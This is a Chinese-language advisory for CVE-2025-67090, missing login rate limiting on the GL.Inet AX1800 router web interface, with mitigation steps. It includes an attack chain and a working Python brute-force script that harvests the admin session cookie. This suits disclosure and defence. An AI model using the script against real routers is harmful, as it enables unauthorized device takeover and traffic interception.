CVE-2025-67090 | Gl.Inet AX1800 LuCI Web界面缺少认证速率限制

漏洞信息

漏洞编号

CVE-2025-67090

漏洞类型

暴力破解/缺少速率限制/认证绕过

CVSS评分

5.1 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

GL.Inet AX1800 (LuCI Web Interface)

漏洞概述

GL.Inet AX1800路由器版本4.6.4和4.6.8的LuCI Web管理界面存在严重的安全漏洞。该漏洞允许未经认证的本地网络攻击者对管理接口(/cgi-bin/luci)进行无限制的密码暴力破解尝试。由于系统缺少速率限制机制和账户锁定策略，攻击者可以无限次尝试密码组合，最终可能获取管理员访问权限。此漏洞的危险在于攻击门槛低，任何能够访问本地网络的用户都可以实施攻击，且不需要任何先决条件或特殊权限。攻击成功后，攻击者可以完全控制路由器设备，进而可能横向移动到内网其他系统或窃取网络流量数据。

技术细节

漏洞根源在于LuCI Web界面的认证端点(/cgi-bin/luci)未实现任何形式的反暴力破解机制。具体表现为：(1)缺少登录尝试次数限制 - 系统不记录连续失败登录次数；(2)缺少账户锁定策略 - 即使多次登录失败也不会临时锁定账户；(3)缺少IP级别的速率限制 - 未对来自同一IP的请求频率进行限制；(4)缺少渐进式延迟机制 - 每次失败登录后未增加等待时间。攻击者可通过编写自动化脚本或使用专业破解工具如Burp Suite、Hydra等，对登录接口发起大规模并发请求。攻击者通常使用常见弱密码字典或自定义密码列表进行尝试，结合用户名枚举(通常默认用户名为admin)可以显著提高攻击效率。成功登录后，攻击者获得完整的管理员权限，可修改路由器配置、植入恶意代码或监控网络流量。

攻击链分析

STEP 1

步骤1

攻击者获得本地网络访问权限（如连接到同一WiFi网络、恶意物理接入或通过ARP欺骗等方式）

STEP 2

步骤2

攻击者识别目标路由器IP地址，通常为192.168.8.1或通过网关发现

STEP 3

步骤3

攻击者访问LuCI Web管理界面登录端点(/cgi-bin/luci)，确认其可访问且无初始防护

STEP 4

步骤4

攻击者使用自动化工具(如Hydra、Burp Suiteintruder或自定义Python脚本)对登录接口发起暴力破解攻击

STEP 5

步骤5

由于系统缺少速率限制和账户锁定机制，攻击者可无限制地尝试密码组合，绕过反暴力破解保护

STEP 6

步骤6

成功匹配有效凭证后，攻击者获取管理员会话Cookie，获得完整路由器控制权限

STEP 7

步骤7

攻击者利用管理员权限修改路由器配置、植入后门、嗅探网络流量或进一步横向移动到内网其他设备

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-67090 PoC - Gl.Inet AX1800 Bruteforce Attack
# This PoC demonstrates the lack of rate limiting on authentication endpoint

import requests
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed

TARGET_URL = "http://{router_ip}/cgi-bin/luci"  # Replace with target IP
USERNAME = "root"
PASSWORD_FILE = "passwords.txt"
MAX_THREADS = 10
DELAY_BETWEEN_REQUESTS = 0.1

def attempt_login(password):
    """Attempt login with given credentials"""
    try:
        data = {
            "username": USERNAME,
            "password": password.strip()
        }
        response = requests.post(TARGET_URL, data=data, timeout=10)
        
        # Check for successful login indicators
        if response.status_code == 200 and "sysauth" in response.cookies:
            return True, password.strip(), response
        
        # No rate limiting detected - continue attempts
        return False, password.strip(), response
    except requests.exceptions.RequestException as e:
        return False, password.strip(), str(e)

def main():
    if len(sys.argv) > 1:
        router_ip = sys.argv[1]
    else:
        router_ip = input("Enter router IP: ")
    
    target = TARGET_URL.format(router_ip=router_ip)
    print(f"[*] Target: {target}")
    print(f"[*] Username: {USERNAME}")
    print(f"[*] Starting brute force attack (no rate limiting detected)...")
    
    try:
        with open(PASSWORD_FILE, 'r') as f:
            passwords = f.readlines()
    except FileNotFoundError:
        print(f"[!] Password file not found. Using common passwords...")
        passwords = ['admin', 'password', '123456', 'admin123', 'default', 'glinet']
    
    found = False
    attempt_count = 0
    
    with ThreadPoolExecutor(max_workers=MAX_THREADS) as executor:
        futures = {executor.submit(attempt_login, pwd): pwd for pwd in passwords}
        
        for future in as_completed(futures):
            success, password, response = future.result()
            attempt_count += 1
            
            if success:
                print(f"\n[!] SUCCESS! Valid credentials found:")
                print(f"    Username: {USERNAME}")
                print(f"    Password: {password}")
                print(f"    Auth Cookie: {response.cookies.get('sysauth')}")
                found = True
                executor.shutdown(wait=False)
                break
            else:
                if attempt_count % 10 == 0:
                    print(f"[*] Attempts: {attempt_count} - No rate limiting detected...")
    
    if not found:
        print(f"\n[-] Attack completed. {attempt_count} attempts made.")
        print("[-] No valid credentials found in password list.")

if __name__ == "__main__":
    main()

# Remediation: Upgrade to GL.Inet AX1800 firmware version 4.8.2

影响范围

GL.Inet AX1800 Firmware < 4.8.2 (Version 4.6.4 affected)

GL.Inet AX1800 Firmware < 4.8.2 (Version 4.6.8 affected)

防御指南

临时缓解措施

在等待官方固件更新期间，建议采取以下临时缓解措施：(1)立即更改路由器默认管理员密码为高强度密码；(2)禁用路由器的远程Web管理功能，仅允许通过有线连接从LAN侧访问；(3)配置MAC地址过滤和访客网络隔离，限制非授权用户接入内网；(4)使用防火墙规则限制管理界面仅允许特定受信任IP地址访问；(5)监控路由器日志文件，关注异常的登录失败事件；(6)如条件允许，考虑暂时替换为不受影响的其他型号路由器。